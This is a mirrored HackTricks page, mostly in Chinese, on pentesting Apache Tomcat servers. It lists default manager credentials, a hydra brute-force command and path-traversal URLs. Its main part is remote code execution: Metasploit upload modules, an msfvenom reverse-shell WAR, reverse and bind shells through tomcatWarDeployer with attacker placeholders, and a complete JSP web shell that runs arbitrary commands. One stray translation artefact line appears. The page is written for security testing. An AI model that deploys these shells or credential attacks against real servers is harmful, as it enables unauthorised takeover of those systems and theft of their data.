maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/tomcat/README.md

237 lines
8.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Tomcat
{{#include ../../../banners/hacktricks-training.md}}
## Discovery
- 它通常运行在 **port 8080**
- **常见的 Tomcat 错误:**
<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
## Enumeration
### **版本识别**
要查找 Apache Tomcat 的版本,可以执行一个简单的命令:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
这将搜索文档索引页面中的“Tomcat”一词揭示HTML响应中标题标签中的版本。
### **管理文件位置**
确定**`/manager`**和**`/host-manager`**目录的确切位置至关重要,因为它们的名称可能会被更改。建议进行暴力搜索以定位这些页面。
### **用户名枚举**
对于6之前的Tomcat版本可以通过以下方式枚举用户名
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **默认凭据**
**`/manager/html`** 目录特别敏感,因为它允许上传和部署 WAR 文件,这可能导致代码执行。该目录受到基本 HTTP 身份验证的保护,常见凭据包括:
- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
可以使用以下方式测试这些凭据:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
另一个显著的目录是 **`/manager/status`**,它显示了 Tomcat 和操作系统版本,有助于识别漏洞。
### **暴力攻击**
要对管理目录进行暴力攻击,可以使用:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
Along with setting various parameters in Metasploit to target a specific host.
## Common Vulnerabilities
### **密码回溯泄露**
在幸运的情况下,访问 `/auth.jsp` 可能会在回溯中泄露密码。
### **双重 URL 编码**
`mod_jk` 中的 CVE-2007-1860 漏洞允许双重 URL 编码路径遍历,通过特制的 URL 实现对管理界面的未经授权访问。
要访问 Tomcat 的管理网页,请前往: `pathTomcat/%252E%252E/manager/html`
### /examples
Apache Tomcat 版本 4.x 到 7.x 包含易受信息泄露和跨站脚本 (XSS) 攻击影响的示例脚本。这些脚本列出得很全面,应检查是否存在未经授权的访问和潜在的利用。查找 [更多信息](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp
### **路径遍历漏洞**
在某些 [**易受攻击的 Tomcat 配置**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) 中,您可以使用路径 `/..;/` 访问 Tomcat 中受保护的目录。
因此,例如,您可能能够通过访问 `www.vulnerable.com/lalala/..;/manager/html` **访问 Tomcat 管理员** 页面。
**另一种方法** 是通过访问 `http://www.vulnerable.com/;param=value/manager/html` 来绕过受保护的路径。
## RCE
最后,如果您可以访问 Tomcat Web 应用程序管理器,您可以 **上传并部署 .war 文件(执行代码)**
### 限制
您只能在拥有 **足够权限**(角色:**admin**、**manager** 和 **manager-script**)的情况下部署 WAR。这些详细信息通常可以在 _tomcat-users.xml_ 中找到,通常定义在 `/usr/share/tomcat9/etc/tomcat-users.xml`(不同版本之间可能有所不同)(请参见 [POST ](#post) 部分)。
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom 反向 Shell
1. 创建要部署的 war
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```
2. 上传 `revshell.war` 文件并访问它 (`/revshell/`):
### 使用 [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) 进行绑定和反向 shell
在某些情况下,这可能不起作用(例如旧版本的 sun
#### 下载
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### 反向 shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### 绑定 shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### 使用 [Culsterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### 手动方法 - Web shell
创建 **index.jsp**,并使用此 [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
```java
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
```
```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
webshell.war is created
# Upload it
```
您还可以安装此程序(允许上传、下载和命令执行):[http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
### 手动方法 2
获取一个 JSP web shell例如 [this](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp),并创建一个 WAR 文件:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST
Tomcat 凭据文件的名称是 `tomcat-users.xml`,该文件指示用户在 tomcat 中的角色。
```bash
find / -name tomcat-users.xml 2>/dev/null
```
请提供需要翻译的内容。
```xml
[...]
<!--
By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
Built-in Tomcat manager roles:
- manager-gui - allows access to the HTML GUI and the status pages
- manager-script - allows access to the HTTP API and the status pages
- manager-jmx - allows access to the JMX proxy and the status pages
- manager-status - allows access to the status pages only
-->
[...]
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
```
## 其他 Tomcat 扫描工具
- [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
## 参考文献
- [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
- [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink